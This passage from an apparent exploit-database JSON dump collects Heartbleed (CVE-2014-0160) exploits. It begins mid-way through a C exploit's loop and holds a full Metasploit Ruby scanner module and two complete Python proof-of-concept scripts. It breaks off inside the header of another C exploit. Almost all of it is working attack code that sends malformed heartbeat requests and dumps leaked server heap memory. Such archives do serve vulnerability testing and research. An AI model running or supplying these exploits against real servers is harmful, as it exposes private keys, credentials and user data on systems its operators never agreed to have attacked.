dtls_server(sd, host, port);\r\n while (1) {\r\n char * bytes = malloc(1024);\r\n struct sockaddr_in peer;\r\n socklen_t len = sizeof(peer);\r\n if (recvfrom(c->socket,bytes,1023,0,(struct sockaddr *)&peer,&len) > 0) {\r\n dtlsheartbleed(c,type);\r\n dtlssneakyleaky(c,file,verbose);\r\n while(loop==1){\r\n printf(\"[ entered heartbleed loop\\n\");\r\n first=0;\r\n repeat=0;\r\n dtlsheartbleed(c,type);\r\n while(repeat==1){\r\n dtlssneakyleaky(c,file,verbose);\r\n }\r\n }\r\n }\r\n }\r\n }\r\n else {\r\n ret = tcp_bind(host, port);\r\n while(1){\r\n sd=accept(ret,0,0);\r\n if(sd==-1){\r\n printf(\"[!] FATAL: problem with accept()\\n\");\r\n exit(0);\r\n }\r\n if(pid=fork()){\r\n close(sd);\r\n }\r\n else{\r\n c = tls_bind(sd);\r\n pre_cmd(ret, precmd, verbose);\r\n heartbleed(c,type);\r\n while(repeat==1){\r\n sneakyleaky(c,file,verbose);\r\n }\r\n while(loop==1){\r\n printf(\"[ entered heartbleed loop\\n\");\r\n first=0;\r\n repeat=0;\r\n heartbleed(c,type);\r\n while(repeat==1){\r\n sneakyleaky(c,file,verbose);\r\n }\r\n }\r\n printf(\"[ done.\\n\");\r\n exit(0);\r\n }\r\n }\r\n }\r\n }\r\n}\n\n# 0day.today [2018-04-13] #", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://0day.today/exploit/22172"}, {"lastseen": "2018-01-03T21:23:15", "references": [], "description": "This Metasploit module implements the OpenSSL Heartbleed attack. The problem exists in the handling of heartbeat requests, where a fake length can be used to leak memory data in the response. Services that support STARTTLS may also be vulnerable.", "edition": 2, "reporter": "metasploit", "published": "2014-04-10T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "type": "zdt", "title": "OpenSSL Heartbeat (Heartbleed) Information Leak Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0160"], "modified": "2014-04-10T00:00:00", "id": "1337DAY-ID-22129", "href": "https://0day.today/exploit/description/22129", "sourceData": "##\r\n# This module requires Metasploit: http//metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Auxiliary\r\n\r\n include Msf::Exploit::Remote::Tcp\r\n include Msf::Auxiliary::Scanner\r\n include Msf::Auxiliary::Report\r\n\r\n CIPHER_SUITES = [\r\n 0xc014, # TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA\r\n 0xc00a, # TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA\r\n 0xc022, # TLS_SRP_SHA_DSS_WITH_AES_256_CBC_SHA\r\n 0xc021, # TLS_SRP_SHA_RSA_WITH_AES_256_CBC_SHA\r\n 0x0039, # TLS_DHE_RSA_WITH_AES_256_CBC_SHA\r\n 0x0038, # TLS_DHE_DSS_WITH_AES_256_CBC_SHA\r\n 0x0088, # TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA\r\n 0x0087, # TLS_DHE_DSS_WITH_CAMELLIA_256_CBC_SHA\r\n 0x0087, # TLS_ECDH_RSA_WITH_AES_256_CBC_SHA\r\n 0xc00f, # TLS_ECDH_ECDSA_WITH_AES_256_CBC_SHA\r\n 0x0035, # TLS_RSA_WITH_AES_256_CBC_SHA\r\n 0x0084, # TLS_RSA_WITH_CAMELLIA_256_CBC_SHA\r\n 0xc012, # TLS_ECDHE_RSA_WITH_3DES_EDE_CBC_SHA\r\n 0xc008, # TLS_ECDHE_ECDSA_WITH_3DES_EDE_CBC_SHA\r\n 0xc01c, # TLS_SRP_SHA_DSS_WITH_3DES_EDE_CBC_SHA\r\n 0xc01b, # TLS_SRP_SHA_RSA_WITH_3DES_EDE_CBC_SHA\r\n 0x0016, # TLS_DHE_RSA_WITH_3DES_EDE_CBC_SHA\r\n 0x0013, # TLS_DHE_DSS_WITH_3DES_EDE_CBC_SHA\r\n 0xc00d, # TLS_ECDH_RSA_WITH_3DES_EDE_CBC_SHA\r\n 0xc003, # TLS_ECDH_ECDSA_WITH_3DES_EDE_CBC_SHA\r\n 0x000a, # TLS_RSA_WITH_3DES_EDE_CBC_SHA\r\n 0xc013, # TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA\r\n 0xc009, # TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA\r\n 0xc01f, # TLS_SRP_SHA_DSS_WITH_AES_128_CBC_SHA\r\n 0xc01e, # TLS_SRP_SHA_RSA_WITH_AES_128_CBC_SHA\r\n 0x0033, # TLS_DHE_RSA_WITH_AES_128_CBC_SHA\r\n 0x0032, # TLS_DHE_DSS_WITH_AES_128_CBC_SHA\r\n 0x009a, # TLS_DHE_RSA_WITH_SEED_CBC_SHA\r\n 0x0099, # TLS_DHE_DSS_WITH_SEED_CBC_SHA\r\n 0x0045, # TLS_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA\r\n 0x0044, # TLS_DHE_DSS_WITH_CAMELLIA_128_CBC_SHA\r\n 0xc00e, # TLS_ECDH_RSA_WITH_AES_128_CBC_SHA\r\n 0xc004, # TLS_ECDH_ECDSA_WITH_AES_128_CBC_SHA\r\n 0x002f, # TLS_RSA_WITH_AES_128_CBC_SHA\r\n 0x0096, # TLS_RSA_WITH_SEED_CBC_SHA\r\n 0x0041, # TLS_RSA_WITH_CAMELLIA_128_CBC_SHA\r\n 0xc011, # TLS_ECDHE_RSA_WITH_RC4_128_SHA\r\n 0xc007, # TLS_ECDHE_ECDSA_WITH_RC4_128_SHA\r\n 0xc00c, # TLS_ECDH_RSA_WITH_RC4_128_SHA\r\n 0xc002, # TLS_ECDH_ECDSA_WITH_RC4_128_SHA\r\n 0x0005, # TLS_RSA_WITH_RC4_128_SHA\r\n 0x0004, # TLS_RSA_WITH_RC4_128_MD5\r\n 0x0015, # TLS_DHE_RSA_WITH_DES_CBC_SHA\r\n 0x0012, # TLS_DHE_DSS_WITH_DES_CBC_SHA\r\n 0x0009, # TLS_RSA_WITH_DES_CBC_SHA\r\n 0x0014, # TLS_DHE_RSA_EXPORT_WITH_DES40_CBC_SHA\r\n 0x0011, # TLS_DHE_DSS_EXPORT_WITH_DES40_CBC_SHA\r\n 0x0008, # TLS_RSA_EXPORT_WITH_DES40_CBC_SHA\r\n 0x0006, # TLS_RSA_EXPORT_WITH_RC2_CBC_40_MD5\r\n 0x0003, # TLS_RSA_EXPORT_WITH_RC4_40_MD5\r\n 0x00ff # Unknown\r\n ]\r\n\r\n HANDSHAKE_RECORD_TYPE = 0x16\r\n HEARTBEAT_RECORD_TYPE = 0x18\r\n ALERT_RECORD_TYPE = 0x15\r\n TLS_VERSION = {\r\n '1.0' => 0x0301,\r\n '1.1' => 0x0302,\r\n '1.2' => 0x0303\r\n }\r\n\r\n TTLS_CALLBACKS = {\r\n 'SMTP' => :tls_smtp,\r\n 'IMAP' => :tls_imap,\r\n 'JABBER' => :tls_jabber,\r\n 'POP3' => :tls_pop3\r\n }\r\n\r\n def initialize\r\n super(\r\n 'Name' => 'OpenSSL Heartbeat (Heartbleed) Information Leak',\r\n 'Description' => %q{\r\n This module implements the OpenSSL Heartbleed attack. The problem\r\n exists in the handling of heartbeat requests, where a fake length can\r\n be used to leak memory data in the response. Services that support\r\n STARTTLS may also be vulnerable.\r\n },\r\n 'Author' => [\r\n 'Neel Mehta', # Vulnerability discovery\r\n 'Riku', # Vulnerability discovery\r\n 'Antti', # Vulnerability discovery\r\n 'Matti', # Vulnerability discovery\r\n 'Jared Stafford <jspenguin[at]jspenguin.org>', # Original Proof of Concept. This module is based on it.\r\n 'FiloSottile', # PoC site and tool\r\n 'Christian Mehlmauer', # Msf module\r\n 'wvu', # Msf module\r\n 'juan vazquez' # Msf module\r\n ],\r\n 'References' =>\r\n [\r\n ['CVE', '2014-0160'],\r\n ['US-CERT-VU', '720951'],\r\n ['URL', 'https://www.us-cert.gov/ncas/alerts/TA14-098A'],\r\n ['URL', 'http://heartbleed.com/'],\r\n ['URL', 'https://github.com/FiloSottile/Heartbleed'],\r\n ['URL', 'https://gist.github.com/takeshixx/10107280'],\r\n ['URL', 'http://filippo.io/Heartbleed/']\r\n ],\r\n 'DisclosureDate' => 'Apr 7 2014',\r\n 'License' => MSF_LICENSE\r\n )\r\n\r\n register_options(\r\n [\r\n Opt::RPORT(443),\r\n OptEnum.new('STARTTLS', [true, 'Protocol to use with STARTTLS, None to avoid STARTTLS ', 'None', [ 'None', 'SMTP', 'IMAP', 'JABBER', 'POP3' ]]),\r\n OptEnum.new('TLSVERSION', [true, 'TLS version to use', '1.0', ['1.0', '1.1', '1.2']])\r\n ], self.class)\r\n\r\n register_advanced_options(\r\n [\r\n OptString.new('XMPPDOMAIN', [ true, 'The XMPP Domain to use when Jabber is selected', 'localhost' ])\r\n ], self.class)\r\n\r\n end\r\n\r\n def peer\r\n \"#{rhost}:#{rport}\"\r\n end\r\n\r\n def tls_smtp\r\n # https://tools.ietf.org/html/rfc3207\r\n sock.get_once\r\n sock.put(\"EHLO #{Rex::Text.rand_text_alpha(10)}\\n\")\r\n res = sock.get_once\r\n\r\n unless res && res =~ /STARTTLS/\r\n return nil\r\n end\r\n sock.put(\"STARTTLS\\n\")\r\n sock.get_once\r\n end\r\n\r\n def tls_imap\r\n # http://tools.ietf.org/html/rfc2595\r\n sock.get_once\r\n sock.put(\"a001 CAPABILITY\\r\\n\")\r\n res = sock.get_once\r\n unless res && res =~ /STARTTLS/i\r\n return nil\r\n end\r\n sock.put(\"a002 STARTTLS\\r\\n\")\r\n sock.get_once\r\n end\r\n\r\n def tls_pop3\r\n # http://tools.ietf.org/html/rfc2595\r\n sock.get_once\r\n sock.put(\"CAPA\\r\\n\")\r\n res = sock.get_once\r\n if res.nil? || res =~ /^-/ || res !~ /STLS/\r\n return nil\r\n end\r\n sock.put(\"STLS\\r\\n\")\r\n res = sock.get_once\r\n if res.nil? || res =~ /^-/\r\n return nil\r\n end\r\n res\r\n end\r\n\r\n def tls_jabber\r\n # http://xmpp.org/extensions/xep-0035.html\r\n msg = \"<?xml version='1.0' ?>\"\r\n msg << \"<stream:stream xmlns='jabber:client' \"\r\n msg << \"xmlns:stream='http://etherx.jabber.org/streams' \"\r\n msg << \"version='1.0' \"\r\n msg << \"to='#{datastore['XMPPDOMAIN']}'>\"\r\n sock.put(msg)\r\n res = sock.get\r\n if res.nil? || res =~ /stream:error/ || res !~ /starttls/i\r\n print_error(\"#{peer} - Jabber host unknown. Please try changing the XMPPDOMAIN option.\") if res && res =~ /<host-unknown/\r\n return nil\r\n end\r\n msg = \"<starttls xmlns='urn:ietf:params:xml:ns:xmpp-tls'/>\"\r\n sock.put(msg)\r\n sock.get_once\r\n end\r\n\r\n def run_host(ip)\r\n connect\r\n\r\n unless datastore['STARTTLS'] == 'None'\r\n vprint_status(\"#{peer} - Trying to start SSL via #{datastore['STARTTLS']}\")\r\n res = self.send(TTLS_CALLBACKS[datastore['STARTTLS']])\r\n if res.nil?\r\n vprint_error(\"#{peer} - STARTTLS failed...\")\r\n return\r\n end\r\n end\r\n\r\n vprint_status(\"#{peer} - Sending Client Hello...\")\r\n sock.put(client_hello)\r\n\r\n server_hello = sock.get\r\n unless server_hello.unpack(\"C\").first == HANDSHAKE_RECORD_TYPE\r\n vprint_error(\"#{peer} - Server Hello Not Found\")\r\n return\r\n end\r\n\r\n vprint_status(\"#{peer} - Sending Heartbeat...\")\r\n heartbeat_length = 16384\r\n sock.put(heartbeat(heartbeat_length))\r\n hdr = sock.get_once(5)\r\n if hdr.blank?\r\n vprint_error(\"#{peer} - No Heartbeat response...\")\r\n return\r\n end\r\n\r\n unpacked = hdr.unpack('Cnn')\r\n type = unpacked[0]\r\n version = unpacked[1] # must match the type from client_hello\r\n len = unpacked[2]\r\n\r\n # try to get the TLS error\r\n if type == ALERT_RECORD_TYPE\r\n res = sock.get_once(len)\r\n alert_unp = res.unpack('CC')\r\n alert_level = alert_unp[0]\r\n alert_desc = alert_unp[1]\r\n msg = \"Unknown error\"\r\n # http://tools.ietf.org/html/rfc5246#section-7.2\r\n case alert_desc\r\n when 0x46\r\n msg = \"Protocol error. Looks like the chosen protocol is not supported.\"\r\n end\r\n print_error(\"#{peer} - #{msg}\")\r\n disconnect\r\n return\r\n end\r\n\r\n unless type == HEARTBEAT_RECORD_TYPE && version == TLS_VERSION[datastore['TLSVERSION']]\r\n vprint_error(\"#{peer} - Unexpected Heartbeat response\")\r\n disconnect\r\n return\r\n end\r\n\r\n vprint_status(\"#{peer} - Heartbeat response, checking if there is data leaked...\")\r\n heartbeat_data = sock.get_once(heartbeat_length) # Read the magic length...\r\n if heartbeat_data\r\n print_good(\"#{peer} - Heartbeat response with leak\")\r\n report_vuln({\r\n :host => rhost,\r\n :port => rport,\r\n :name => self.name,\r\n :refs => self.references,\r\n :info => \"Module #{self.fullname} successfully leaked info\"\r\n })\r\n vprint_status(\"#{peer} - Printable info leaked: #{heartbeat_data.gsub(/[^[:print:]]/, '')}\")\r\n else\r\n vprint_error(\"#{peer} - Looks like there isn't leaked information...\")\r\n end\r\n end\r\n\r\n def heartbeat(length)\r\n payload = \"\\x01\" # Heartbeat Message Type: Request (1)\r\n payload << [length].pack(\"n\") # Payload Length: 16384\r\n\r\n ssl_record(HEARTBEAT_RECORD_TYPE, payload)\r\n end\r\n\r\n def client_hello\r\n # Use current day for TLS time\r\n time_temp = Time.now\r\n time_epoch = Time.mktime(time_temp.year, time_temp.month, time_temp.day, 0, 0).to_i\r\n\r\n hello_data = [TLS_VERSION[datastore['TLSVERSION']]].pack(\"n\") # Version TLS\r\n hello_data << [time_epoch].pack(\"N\") # Time in epoch format\r\n hello_data << Rex::Text.rand_text(28) # Random\r\n hello_data << \"\\x00\" # Session ID length\r\n hello_data << [CIPHER_SUITES.length * 2].pack(\"n\") # Cipher Suites length (102)\r\n hello_data << CIPHER_SUITES.pack(\"n*\") # Cipher Suites\r\n hello_data << \"\\x01\" # Compression methods length (1)\r\n hello_data << \"\\x00\" # Compression methods: null\r\n\r\n hello_data_extensions = \"\\x00\\x0f\" # Extension type (Heartbeat)\r\n hello_data_extensions << \"\\x00\\x01\" # Extension length\r\n hello_data_extensions << \"\\x01\" # Extension data\r\n\r\n hello_data << [hello_data_extensions.length].pack(\"n\")\r\n hello_data << hello_data_extensions\r\n\r\n data = \"\\x01\\x00\" # Handshake Type: Client Hello (1)\r\n data << [hello_data.length].pack(\"n\") # Length\r\n data << hello_data\r\n\r\n ssl_record(HANDSHAKE_RECORD_TYPE, data)\r\n end\r\n\r\n def ssl_record(type, data)\r\n record = [type, TLS_VERSION[datastore['TLSVERSION']], data.length].pack('Cnn')\r\n record << data\r\n end\r\nend\n\n# 0day.today [2018-01-03] #", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://0day.today/exploit/22129"}, {"lastseen": "2018-03-03T01:40:21", "references": [], "description": "Exploit for multiple platform in category remote exploits", "edition": 2, "reporter": "Fitzl Csaba", "published": "2014-04-09T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "type": "zdt", "title": "OpenSSL 1.0.1f TLS Heartbeat Extension - Memory Disclosure (Multiple SSL/TLS versions)", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0160"], "modified": "2014-04-09T00:00:00", "id": "1337DAY-ID-22122", "href": "https://0day.today/exploit/description/22122", "sourceData": "# Exploit Title: [OpenSSL TLS Heartbeat Extension - Memory Disclosure - Multiple SSL/TLS versions]\r\n# Date: [2014-04-09]\r\n# Exploit Author: [Csaba Fitzl]\r\n# Vendor Homepage: [http://www.openssl.org/]\r\n# Software Link: [http://www.openssl.org/source/openssl-1.0.1f.tar.gz]\r\n# Version: [1.0.1f]\r\n# Tested on: [N/A]\r\n# CVE : [2014-0160]\r\n \r\n \r\n#!/usr/bin/env python\r\n \r\n# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford ([email\u00a0protected])\r\n# The author disclaims copyright to this source code.\r\n# Modified by Csaba Fitzl for multiple SSL / TLS version support\r\n \r\nimport sys\r\nimport struct\r\nimport socket\r\nimport time\r\nimport select\r\nimport re\r\nfrom optparse import OptionParser\r\n \r\noptions = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)')\r\noptions.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)')\r\n \r\ndef h2bin(x):\r\n return x.replace(' ', '').replace('\\n', '').decode('hex')\r\n \r\nversion = []\r\nversion.append(['SSL 3.0','03 00'])\r\nversion.append(['TLS 1.0','03 01'])\r\nversion.append(['TLS 1.1','03 02'])\r\nversion.append(['TLS 1.2','03 03'])\r\n \r\ndef create_hello(version):\r\n hello = h2bin('16 ' + version + ' 00 dc 01 00 00 d8 ' + version + ''' 53\r\n43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf\r\nbd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00\r\n00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88\r\n00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c\r\nc0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09\r\nc0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44\r\nc0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c\r\nc0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11\r\n00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04\r\n03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19\r\n00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08\r\n00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13\r\n00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00\r\n00 0f 00 01 01\r\n''')\r\n return hello\r\n \r\ndef create_hb(version):\r\n hb = h2bin('18 ' + version + ' 00 03 01 40 00')\r\n return hb\r\n \r\ndef hexdump(s):\r\n for b in xrange(0, len(s), 16):\r\n lin = [c for c in s[b : b + 16]]\r\n hxdat = ' '.join('%02X' % ord(c) for c in lin)\r\n pdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin)\r\n print ' %04x: %-48s %s' % (b, hxdat, pdat)\r\n print\r\n \r\ndef recvall(s, length, timeout=5):\r\n endtime = time.time() + timeout\r\n rdata = ''\r\n remain = length\r\n while remain > 0:\r\n rtime = endtime - time.time()\r\n if rtime < 0:\r\n return None\r\n r, w, e = select.select([s], [], [], 5)\r\n if s in r:\r\n data = s.recv(remain)\r\n # EOF?\r\n if not data:\r\n return None\r\n rdata += data\r\n remain -= len(data)\r\n return rdata\r\n \r\n \r\ndef recvmsg(s):\r\n hdr = recvall(s, 5)\r\n if hdr is None:\r\n print 'Unexpected EOF receiving record header - server closed connection'\r\n return None, None, None\r\n typ, ver, ln = struct.unpack('>BHH', hdr)\r\n pay = recvall(s, ln, 10)\r\n if pay is None:\r\n print 'Unexpected EOF receiving record payload - server closed connection'\r\n return None, None, None\r\n print ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay))\r\n return typ, ver, pay\r\n \r\ndef hit_hb(s,hb):\r\n s.send(hb)\r\n while True:\r\n typ, ver, pay = recvmsg(s)\r\n if typ is None:\r\n print 'No heartbeat response received, server likely not vulnerable'\r\n return False\r\n \r\n if typ == 24:\r\n print 'Received heartbeat response:'\r\n hexdump(pay)\r\n if len(pay) > 3:\r\n print 'WARNING: server returned more data than it should - server is vulnerable!'\r\n else:\r\n print 'Server processed malformed heartbeat, but did not return any extra data.'\r\n return True\r\n \r\n if typ == 21:\r\n print 'Received alert:'\r\n hexdump(pay)\r\n print 'Server returned error, likely not vulnerable'\r\n return False\r\n \r\ndef main():\r\n opts, args = options.parse_args()\r\n if len(args) < 1:\r\n options.print_help()\r\n return\r\n for i in range(len(version)):\r\n print 'Trying ' + version[i][0] + '...'\r\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n print 'Connecting...'\r\n sys.stdout.flush()\r\n s.connect((args[0], opts.port))\r\n print 'Sending Client Hello...'\r\n sys.stdout.flush()\r\n s.send(create_hello(version[i][1]))\r\n print 'Waiting for Server Hello...'\r\n sys.stdout.flush()\r\n while True:\r\n typ, ver, pay = recvmsg(s)\r\n if typ == None:\r\n print 'Server closed connection without sending Server Hello.'\r\n return\r\n # Look for server hello done message.\r\n if typ == 22 and ord(pay[0]) == 0x0E:\r\n break\r\n \r\n print 'Sending heartbeat request...'\r\n sys.stdout.flush()\r\n s.send(create_hb(version[i][1]))\r\n if hit_hb(s,create_hb(version[i][1])):\r\n #Stop if vulnerable\r\n break\r\n \r\nif __name__ == '__main__':\r\n main()\n\n# 0day.today [2018-03-02] #", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://0day.today/exploit/22122"}, {"lastseen": "2018-03-19T11:11:23", "references": [], "edition": 2, "description": "This memory disclosure exploit is a quick and dirty demonstration of the TLS heartbeat extension vulnerability.", "reporter": "Jared Stafford", "published": "2014-04-08T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "type": "zdt", "title": "OpenSSL TLS Heartbeat Extension - Memory Disclosure", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0160"], "modified": "2014-04-08T00:00:00", "id": "1337DAY-ID-22114", "href": "https://0day.today/exploit/description/22114", "sourceData": "#!/usr/bin/python\r\n \r\n# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford ([email\u00a0protected])\r\n# The author disclaims copyright to this source code.\r\n \r\nimport sys\r\nimport struct\r\nimport socket\r\nimport time\r\nimport select\r\nimport re\r\nfrom optparse import OptionParser\r\n \r\noptions = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)')\r\noptions.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)')\r\n \r\ndef h2bin(x):\r\n return x.replace(' ', '').replace('\\n', '').decode('hex')\r\n \r\nhello = h2bin('''\r\n16 03 02 00 dc 01 00 00 d8 03 02 53\r\n43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf\r\nbd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00\r\n00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88\r\n00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c\r\nc0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09\r\nc0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44\r\nc0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c\r\nc0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11\r\n00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04\r\n03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19\r\n00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08\r\n00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13\r\n00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00\r\n00 0f 00 01 01 \r\n''')\r\n \r\nhb = h2bin('''\r\n18 03 02 00 03\r\n01 40 00\r\n''')\r\n \r\ndef hexdump(s):\r\n for b in xrange(0, len(s), 16):\r\n lin = [c for c in s[b : b + 16]]\r\n hxdat = ' '.join('%02X' % ord(c) for c in lin)\r\n pdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin)\r\n print ' %04x: %-48s %s' % (b, hxdat, pdat)\r\n print\r\n \r\ndef recvall(s, length, timeout=5):\r\n endtime = time.time() + timeout\r\n rdata = ''\r\n remain = length\r\n while remain > 0:\r\n rtime = endtime - time.time()\r\n if rtime < 0:\r\n return None\r\n r, w, e = select.select([s], [], [], 5)\r\n if s in r:\r\n data = s.recv(remain)\r\n # EOF?\r\n if not data:\r\n return None\r\n rdata += data\r\n remain -= len(data)\r\n return rdata\r\n \r\n \r\ndef recvmsg(s):\r\n hdr = recvall(s, 5)\r\n if hdr is None:\r\n print 'Unexpected EOF receiving record header - server closed connection'\r\n return None, None, None\r\n typ, ver, ln = struct.unpack('>BHH', hdr)\r\n pay = recvall(s, ln, 10)\r\n if pay is None:\r\n print 'Unexpected EOF receiving record payload - server closed connection'\r\n return None, None, None\r\n print ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay))\r\n return typ, ver, pay\r\n \r\ndef hit_hb(s):\r\n s.send(hb)\r\n while True:\r\n typ, ver, pay = recvmsg(s)\r\n if typ is None:\r\n print 'No heartbeat response received, server likely not vulnerable'\r\n return False\r\n \r\n if typ == 24:\r\n print 'Received heartbeat response:'\r\n hexdump(pay)\r\n if len(pay) > 3:\r\n print 'WARNING: server returned more data than it should - server is vulnerable!'\r\n else:\r\n print 'Server processed malformed heartbeat, but did not return any extra data.'\r\n return True\r\n \r\n if typ == 21:\r\n print 'Received alert:'\r\n hexdump(pay)\r\n print 'Server returned error, likely not vulnerable'\r\n return False\r\n \r\ndef main():\r\n opts, args = options.parse_args()\r\n if len(args) < 1:\r\n options.print_help()\r\n return\r\n \r\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n print 'Connecting...'\r\n sys.stdout.flush()\r\n s.connect((args[0], opts.port))\r\n print 'Sending Client Hello...'\r\n sys.stdout.flush()\r\n s.send(hello)\r\n print 'Waiting for Server Hello...'\r\n sys.stdout.flush()\r\n while True:\r\n typ, ver, pay = recvmsg(s)\r\n if typ == None:\r\n print 'Server closed connection without sending Server Hello.'\r\n return\r\n # Look for server hello done message.\r\n if typ == 22 and ord(pay[0]) == 0x0E:\r\n break\r\n \r\n print 'Sending heartbeat request...'\r\n sys.stdout.flush()\r\n s.send(hb)\r\n hit_hb(s)\r\n \r\nif __name__ == '__main__':\r\n main()\n\n# 0day.today [2018-03-19] #", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://0day.today/exploit/22114"}], "seebug": [{"lastseen": "2017-11-19T17:10:46", "_object_types": ["robots.models.base.Bulletin", "robots.models.seebug.SeebugBulletin"], "enchantments_done": [], "references": [], "description": "No description provided by source.", "reporter": "Root", "published": "2014-07-01T00:00:00", "title": "Heartbleed OpenSSL - Information Leak Exploit (2) - DTLS Support", "type": "seebug", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0160"], "_object_type": "robots.models.seebug.SeebugBulletin", "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-86255", "id": "SSV:86255", "sourceData": "\n /* \r\n* CVE-2014-0160 heartbleed OpenSSL information leak exploit\r\n* =========================================================\r\n* This exploit uses OpenSSL to create an encrypted connection\r\n* and trigger the heartbleed leak. The leaked information is\r\n* returned within encrypted SSL packets and is then decrypted \r\n* and wrote to a file to annoy IDS/forensics. The exploit can \r\n* set heartbeat payload length arbitrarily or use two preset \r\n* values for NULL and MAX length. The vulnerability occurs due \r\n* to bounds checking not being performed on a heap value which \r\n* is user supplied and returned to the user as part of DTLS/TLS \r\n* heartbeat SSL extension. All versions of OpenSSL 1.0.1 to \r\n* 1.0.1f are known affected. You must run this against a target \r\n* which is linked to a vulnerable OpenSSL library using DTLS/TLS.\r\n* This exploit leaks upto 65532 bytes of remote heap each request\r\n* and can be run in a loop until the connected peer ends connection.\r\n* The data leaked contains 16 bytes of random padding at the end.\r\n* The exploit can be used against a connecting client or server,\r\n* it can also send pre_cmd's to plain-text services to establish\r\n* an SSL session such as with STARTTLS on SMTP/IMAP/POP3. Clients\r\n* will often forcefully close the connection during large leak\r\n* requests so try to lower your payload request size. \r\n*\r\n* Compiled on ArchLinux x86_64 gcc 4.8.2 20140206 w/OpenSSL 1.0.1g \r\n*\r\n* E.g.\r\n* $ gcc -lssl -lssl3 -lcrypto heartbleed.c -o heartbleed\r\n* $ ./heartbleed -s 192.168.11.23 -p 443 -f out -t 1\r\n* [ heartbleed - CVE-2014-0160 - OpenSSL information leak exploit\r\n* [ =============================================================\r\n* [ connecting to 192.168.11.23 443/tcp\r\n* [ connected to 192.168.11.23 443/tcp\r\n* [ <3 <3 <3 heart bleed <3 <3 <3\r\n* [ heartbeat returned type=24 length=16408\r\n* [ decrypting SSL packet\r\n* [ heartbleed leaked length=65535\r\n* [ final record type=24, length=16384\r\n* [ wrote 16381 bytes of heap to file 'out'\r\n* [ heartbeat returned type=24 length=16408\r\n* [ decrypting SSL packet\r\n* [ final record type=24, length=16384\r\n* [ wrote 16384 bytes of heap to file 'out'\r\n* [ heartbeat returned type=24 length=16408\r\n* [ decrypting SSL packet\r\n* [ final record type=24, length=16384\r\n* [ wrote 16384 bytes of heap to file 'out'\r\n* [ heartbeat returned type=24 length=16408\r\n* [ decrypting SSL packet\r\n* [ final record type=24, length=16384\r\n* [ wrote 16384 bytes of heap to file 'out'\r\n* [ heartbeat returned type=24 length=42\r\n* [ decrypting SSL packet\r\n* [ final record type=24, length=18\r\n* [ wrote 18 bytes of heap to file 'out'\r\n* [ done.\r\n* $ ls -al out\r\n* -rwx------ 1 fantastic fantastic 65554 Apr 11 13:53 out\r\n* $ hexdump -C out\r\n* - snip - snip \r\n*\r\n* Use following example command to generate certificates for clients.\r\n*\r\n* $ openssl req -x509 -nodes -days 365 -newkey rsa:2048 \\\r\n* -keyout server.key -out 